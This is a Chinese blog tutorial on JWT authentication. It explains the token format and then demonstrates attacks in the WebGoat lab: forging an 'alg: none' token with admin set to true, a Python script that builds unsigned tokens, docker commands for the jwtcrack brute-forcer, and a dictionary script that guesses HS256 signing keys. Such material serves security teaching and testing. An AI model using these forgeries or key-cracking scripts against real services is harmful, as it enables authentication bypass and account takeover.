JWT身份认证-安全漏洞

已于 2022-05-03 17:54:43 修改
阅读量3.5k 收藏 7
点赞数 4
分类专栏: 安全 文章标签: 安全 json web安全
于 2022-05-03 15:07:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263019/article/details/124552114
版权

一、JWT介绍

JWT(JSON Web Token) 是WEB上用于确认客户端和服务端用户身份认证的token令牌,保存了用户的登录信息。用户登录,由服务端用加密算法对JWT进行签发,前端发送带有用户信的JWT由服务端校验(用户名、失效等信息),并将令牌保存在前端本地。

JWT官网默认的示例,令牌采用 base64 编码,并由三部分组成
在这里插入图片描述

1、头部(Header),JWT元数据的JSON对象
{
"alg":"HS256",       # 签名使用的算法
"typ":"JWT"			 # token的类型为JWT
}

2、声明(payload),主体内容部分,跟H5 body一样,不过JWT默认只有七个参数,根据实际需要自行填写
{
  "sub": "Admin::110110",
  "clientId": "1539805943529823283",
  "exp": 1851718216,
  "iat": 1851113416,
  "username": "Admin::110110"
}

iss:JWT签发人
exp:用户认证的失效时间(大于签发时间)
sub:主题
aud:用户
nbf:定义此时间之前,该JWT不可用
iat:JWT 签发时间
jti:JWT ID身份标识


3、签名(Signature)
签名是对上面两部分做哈希数据签名(指定算法),来确保数据不会被篡改,保证数据的完整性校验。
需要使用base64编码后的header和payload数据。此部分保存在服务端。

HMACSHA256(
  base64UrlEncode(header) + "." +
  base64UrlEncode(payload),
  miyao      # 密钥值

<---示例:三个部分组成json的字符串,每个部分由 . 分割,创建JWT对象--->
eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJTdXBlckFkbWluOjoxNDkxMzU0MDQ1MjUwNTQzNjE4IiwiY2xpZW50SWQiOiIxNTE5NTA1OTIzMTI5ODIzMjMzIiwiZXhwIjoxNjUxNzE4MjE3LCJpYXQiOjE2NTExMTM0MTcsInVzZXJuYW1lIjoiU3VwZXJBZG1pbjo6MTQ5MTM1NDA0NTI1MDU0MzYxOCJ9.IT14ZUV48s-VqzHurB3TZC-mX3mZ9OCBIFK7u-qAwVs

二、JWT安全漏洞

WebGoat 小靶场为演示,主要了解JWT的作用

《管理员盗用-重复投票》在这里插入图片描述
1、将数据包中的cookie复制到 jwt.io进行解码,看到有admin:false这个参数,就知道有逻辑绕过的可能。
在这里插入图片描述

2、修改以下admin为ture和alg为none

{
  "alg": "none"
}
编码后为 ewogICJhbGciOiAibm9uZSIKfQ==

{
  "iat": 1652417270,
  "admin": "true",
  "user": "Sylvester"
}
编码后为 eyJpYXQiOjE2NTI0MTcyNzAsImFkbWluIjoidHJ1ZSIsInVzZXIiOiJTeWx2ZXN0ZXIifQ

"在HTTP传输过程中,Base64编码中的"=","+","/“等特殊符号通过URL解码通常容易产生歧义,在Base64 URL编码中,”+“会变成”-","/“会变成”_","="会被去掉,以此达到url safe的目的。
ewogICJhbGciOiAibm9uZSIKfQ.eyJpYXQiOjE2NTI0MTcyNzAsImFkbWluIjoidHJ1ZSIsInVzZXIiOiJTeWx2ZXN0ZXIifQ.

3、结合burp转发,已成功投票
在这里插入图片描述

《jwt.io 解码小脚本》

import base64

def jwtBase64Encode(x):
    return base64.b64encode(x.encode('utf-8')).decode().replace('+', '-').replace('/', '_').replace('=', '')

header = input("[*] 输入header部分的明文,放一行:")
payload = input("[*] 输入payload部分的明文,放一行:")
print(jwtBase64Encode(header)+'.'+jwtBase64Encode(payload)+'.')

《jwtcrack 密钥爆破工具——字符序列穷举方式暴破》

[root@kali:/opt/c-jwt-cracker-master ]# docker build . -t jwtcrack
[root@kali:/opt/c-jwt-cracker-master ]# docker run -it --rm  jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
Secret is "Sn1f"

《python弱密钥脚本猜解——字典》

#!/usr/bin/python3
# -*- coding:utf-8 -*-
import jwt

jwt_json='eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTYxNTAyMTAzNiwiZXhwIjoxNjE1MDIyMjM2LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.x_ENVoZZRSDnjUqKHOAOYvTDrAtzfLw-_i02Qqry7so'

with open('jwt.secrets.list', encoding='utf-8') as f:
   for line in f:
       key = line.strip()
       try:
           jwt.decode(jwt_json, verify=True, key=key, algorithms='HS256')
           print('found key! --> ' +  key)
           break
       except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
           print('found key! --> ' +  key)
           break
       except(jwt.exceptions.InvalidSignatureError):
           print('verify key! -->' + key)
           continue
   else:
       print("key not found!")
	
脚本转载:https://www.jianshu.com/p/223b9112fc5e
JWT弱签名-应用扫描

在这里插入图片描述
结合以上靶场的演示案例,利用解码工具查看数据,是否有铭感参数,对JWT令牌进行修改,如uid遍历,user伪造,alg空算法等方面验证。

学不完的代码篇章
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JWT认证漏洞攻击详解总结
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1280
​ 0x01 JWT认证漏洞基础知识 1.JWT简介 JWT全称为JSON Web Token,将json对象作为载体来传输信息。通常用于身份认证和信息交换。JWT 可以使用密钥(HMAC 算法)或使用 RSA 或 ECDSA 的公钥/私钥对自身进行签名 2.JWT认证漏洞格式 每当用户访问站点中的资源时,对应的请求头认证默认为Authorization: jwt,JTW令牌认证以eyJ开头 JWT的数据头部如下: JWT的数据分为三部分:头部(Header),有效载荷(Payload),签名(Signa
JWT安全认证
qq_45244974的博客
04-09 418
JWT安全相关代码![在这里插入图片描述](https://img-blog.csdnimg.cn/2020040923251333.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1MjQ0OTc0,size_16,color_...
JWT安全漏洞以及常见攻击方式
最新发布
baimao__Ch的博客
05-22 416
随着web应用的日渐复杂化,某些场景下,仅使用Cookie、Session等常见的身份鉴别方式无法满足业务的需要,JWT也就应运而生,JWT可以有效的解决分布式场景下的身份鉴别问题,并且会规避掉一些安全问题,如CORS跨域漏洞,CSRF漏洞等。JWTJson WebToken的缩写,顾名思义,是Token的一种。它常被用来在向服务器发起请求时用作身份认证。使用JWT作为身份认证的优势在于:它不需要在服务端去保留用户的认证信息。
JWT相关漏洞介绍
2301_77512689的博客
05-05 1237
第二部分是负载,内容也是一个json对象,它是存放有效信息的地方,它可以存放jwt提供的现成字段,比 如:iss(签发者),exp(过期时间戳), sub(面向的用户)等,也可自定义字段。JWT只通过算法实现对Token合法性的验证,不依赖数据库,Memcached的等存储系统,因此可以做到跨服务器验证,只要密钥和算法相同,不同服务器程序生成的Token可以互相验证,alg:none攻击通俗易懂的讲就是由于开发代码使用错误,后端不校验签名,导致攻击者可以在不需要密钥的情况下也可以控制伪造令牌。
JWT认证漏洞总结
渗透测试研究中心
09-16 4018
通过对众多靶场案例漏洞测试,其中弱密钥、密钥泄露、不校验签名、信息泄露这些问题出现的居多,像更改 Header 不使用签名,暂时在实际生产环境中没遇到过。测试方面遇到 JWT可利用 jwt-tools 工具进行测试,将所有已知漏洞都测试一遍,避免遗漏。密钥。
JWTJSON Web Token)漏洞
Bird&Bird
08-26 7389
目录一、JWT介绍1.1概念1.2、JWT结构1.3、JWT获取流程1.4、Base64 URL编码二、删除签名五、爆破HMAC密钥 一、JWT介绍 1.1概念 JSON Web Token (JWT) 是一种开放标准 (RFC 7519),它定义了一种紧凑且自包含的方式,用于 在各方之间作为 JSON 对象安全地传输信息。该信息可以被验证和信任,因为它是经过数字签名的。JWT 可以使用密钥(使用 HMAC 算法)或使用 RSA 的公钥/私钥对进行签名。 1.2、JWT结构 JWT分为三部分,头部(Hea
Go-Charon-授权和身份验证服务
08-14
LDAP 用于存储和管理用户账户信息,JWT 则是一种轻量级的身份认证和授权机制,能在不同域之间安全地传递信息。 Charon 还支持自定义扩展,允许开发者根据业务需求添加额外的功能或改变默认行为。例如,可以编写插件...
lumen-auth:使用JWT进行流明简单身份验证
03-16
我们认为,发展必须是一种令人愉快的,富有创造力的经历,才能真正实现。 Lumen试图通过减轻大多数Web项目中使用的常见任务(例如路由,数据库抽象,... 所有安全漏洞将得到及时解决。执照Lumen框架是根据的开源软件。
python中JWT用户认证的实现
09-16
JWT是一种轻量级的数据交换格式,它以JSON对象的形式存储用户的身份信息和其他相关信息,并且可以在各个组件之间安全地传输。JWT的主要优势在于: - **简洁性**:JWT的大小较小,可以轻松通过URL、POST参数或...
peek-jwt-crx插件
04-02
JWT是一种安全的、轻量级的身份验证和授权机制,常用于API认证或者用户身份验证。这个插件使得用户无需离开浏览器就能查看和理解JWT的结构和内容。 JWT的基本组成部分包括三个部分:Header(头部)、Payload(载荷...
Python-Python安全脚本
08-10
13. 身份验证与授权:使用合适的认证和授权机制,如OAuth2或JWT,确保只有授权的用户可以访问特定资源。 14. 容器化与隔离:使用Docker或其他容器技术,将应用程序隔离运行,减少系统级别的安全风险。 15. 定期...
go-jwt-middleware:Go编程语言中间件,用于检查HTTP请求上的JWT
04-28
注意:我们使用jwt-go的分支发布了此版本,以解决安全漏洞。 由于jwt-go未被积极维护,因此我们将在不久的将来切换到维护程度更高的软件包。 中间件将检查是否在Authorization标头上发送了 ,然后将JWT的内容设置为...
jwt-handbook.zip_JSON_JWT Handbook_jwt handbook_jwt hankbook_jw
09-23
8. **最佳实践**:JWT Handbook可能还包含了如何正确使用和配置JWT的最佳实践,例如设置合适的过期时间,避免在HTTP响应头中暴露敏感信息,以及如何处理JWT安全漏洞。 通过阅读JWT Handbook,开发者可以深入理解...
dingo-jwt-sample:改编自https
05-14
Laravel试图通过减轻大多数Web项目中使用的常见任务(例如身份验证,路由,会话,队列和缓存)来减轻开发的痛苦。 Laravel易于访问,但功能强大,为大型,强大的应用程序提供了所需的强大工具。 出色的控制容器...
Bldg16-安全
02-13
5. **JSON Web Tokens (JWT)和身份验证**:JWT常用于在前后端之间安全地传输认证信息。理解JWT的工作原理、签发、验证以及如何防止令牌盗窃至关重要。 6. **防止点击劫持**:点击劫持是一种视觉欺骗攻击,...
JWT漏洞
qq_41696518的博客
06-24 892
JWT其实就是对传输数据套了一层加密,保证数据没有被篡改和替换。没有密钥的情况下,直接修改数据时无效的,无法通过数据校验。JWT其实是明文传输。JWT对传输的header、payload数据其实就是Base64加密,可直接解密。仅是加了签名字段,校验数据是否被更改,所以JWT一般不传输敏感数据。同时程序员没注意也存在敏感信息泄露。
安全经典JWT算法漏洞
kali_Ma的博客
11-29 5900
1、什么是JWTJSON Web令牌(JWT)是一个开放标准(RFC 7519),它定义了一种紧凑而独立的方法,用于在各方之间安全地将信息作为JSON对象传输。由于此信息是经过数字签名的,因此可以被验证和信任。可以使用secret(HMAC算法)或使用“RSA或ECDSA的公用/私有key pair密钥对”对JWT进行签名。 尽管可以对JWT进行加密以提供双方之间的secrecy保密性,但我们将重点关注signed tokens已签名的令牌。signed tokens已签名的令牌可以
JWT安全漏洞Web攻击技术解析
总结来说,这些挑战涵盖了身份验证(JWT)、代码注入(模板注入)以及Python Web开发中的安全问题。了解和防范这些威胁对于维护网络安全至关重要,特别是在CTF(Capture The Flag)竞赛和日常的Web应用开发中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学不完的代码篇章

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值